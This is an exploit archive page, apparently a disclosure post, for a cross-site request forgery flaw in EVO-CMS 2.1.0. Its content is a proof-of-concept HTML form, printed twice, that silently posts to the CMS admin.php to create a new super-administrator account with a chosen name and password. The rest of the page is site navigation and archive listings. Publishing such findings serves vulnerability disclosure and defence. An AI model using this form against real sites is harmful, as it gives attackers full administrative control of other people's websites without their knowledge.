EVO-CMS 2.1.0 Cross Site Request Forgery

EVO-CMS 2.1.0 Cross Site Request Forgery: Posted Feb 24, 2015; Authored by Provensec; EVO-CMS version 2.1.0 suffers from a cross site request forgery vulnerability.; tags | exploit, csrf; SHA-256 | 66e5f8134ad653e12601254b070187c2490a4f4b12edc64f2234aa3bbaa5b11e; Download | Favorite | View

EVO-CMS 2.1.0 Cross Site Request Forgery

# Affected software:  evo cms
# Type of vulnerability: adding new admin (csrf)
# URL: http://www.evo-german.com/
# Discovered by: Provensec
# Website: http://www.provensec.com
#version:EVO-CMS 2.1.0
# Proof of concept

attacker was able to add new admin as there were no protection against csrf


poc

<html>

  <body>
    <form action="http://demo.opensourcecms.com/evocms/admin.php" method="POST">
      <input type="hidden" name="authors[add_name]" value="test" />
      <input type="hidden" name="authors[add_aid]"
value="test123" />
      <input type="hidden" name="authors[add_email]"
value="test@gmail.com" />
      <input type="hidden" name="authors[add_url]"
value="http://demo.opensourcecms.com/evocms/" />
      <input type="hidden" name="authors[add_admlanguage]"
value="english" />
      <input type="hidden" name="authors[add_radminsuper]"
value="1" />
      <input type="hidden" name="authors[add_pwd]"
value="test123" />
      <input type="hidden" name="authors[add_pwd2]"
value="test123" />
      <input type="hidden" name="op" value="addadmin" />
      <input type="hidden" name="module" value="authors" />
      <input type="hidden" name="submit" value="Create Administrator" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>











poc:

<html>

  <body>
    <form action="http://demo.opensourcecms.com/evocms/admin.php" method="POST">
      <input type="hidden" name="authors[add_name]" value="test" />
      <input type="hidden" name="authors[add_aid]"
value="test123" />
      <input type="hidden" name="authors[add_email]"
value="test@gmail.com" />
      <input type="hidden" name="authors[add_url]"
value="http://demo.opensourcecms.com/evocms/" />
      <input type="hidden" name="authors[add_admlanguage]"
value="english" />
      <input type="hidden" name="authors[add_radminsuper]"
value="1" />
      <input type="hidden" name="authors[add_pwd]"
value="test123" />
      <input type="hidden" name="authors[add_pwd2]"
value="test123" />
      <input type="hidden" name="op" value="addadmin" />
      <input type="hidden" name="module" value="authors" />
      <input type="hidden" name="submit" value="Create Administrator" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Top Authors In Last 30 Days

Red Hat 228 files
Ubuntu 55 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Google Security Research 6 files
Apple 6 files
Milad Karimi 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,333)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,578)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,460)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

EVO-CMS 2.1.0 Cross Site Request Forgery

EVO-CMS 2.1.0 Cross Site Request Forgery

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

EVO-CMS 2.1.0 Cross Site Request Forgery

Share This

EVO-CMS 2.1.0 Cross Site Request Forgery

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems